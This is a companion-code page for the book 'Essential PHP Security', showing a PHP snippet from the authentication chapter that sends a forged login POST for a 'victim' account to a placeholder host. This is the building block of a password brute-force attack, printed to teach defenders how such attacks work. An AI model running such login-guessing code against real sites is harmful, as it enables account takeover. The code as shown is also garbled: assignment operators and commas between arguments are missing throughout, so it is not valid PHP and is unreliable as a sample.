Essential PHP Security Book Cover
Essential PHP Security by Chris Shiflett
About | Contents | Buy Now | Reviews | Errata | Code
  1. Foreword
  2. Preface
  1. Introduction
  2. Forms and URLs
          ch02.pdf
  3. Databases and SQL
  4. Sessions and Cookies
          ch04.pdf
  5. Includes
  6. Files and Commands
  7. Authentication and Authorization
  8. Shared Hosting
  1. Configuration Directives
  2. Functions
  3. Cryptography
  4. Index

Brute Force an Authentication Form

(Chapter 7, Authentication and Authorization - Pg 65)

< Back to Code Repository

<?php

$username 'victim';
$password 'guess';

$content "username=$username&password=$password";
$content_length strlen($content);

$http_request '';
$http_response '';

$http_request .= "POST /login.php HTTP/1.1\r\n";
$http_request .= "Host: example.org\r\n";
$http_request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$http_request .= "Content-Length: $content_length\r\n";
$http_request .= "Connection: close\r\n";
$http_request .= "\r\n";
$http_request .= $content;

if ($handle fsockopen('example.org'80))
{
    fputs($handle$http_request);

    while (!feof($handle))
    {
        $http_response .= fgets($handle1024);
    }

    fclose($handle);

    /* Check Response */
}
else
{
    /* Error */
}

?>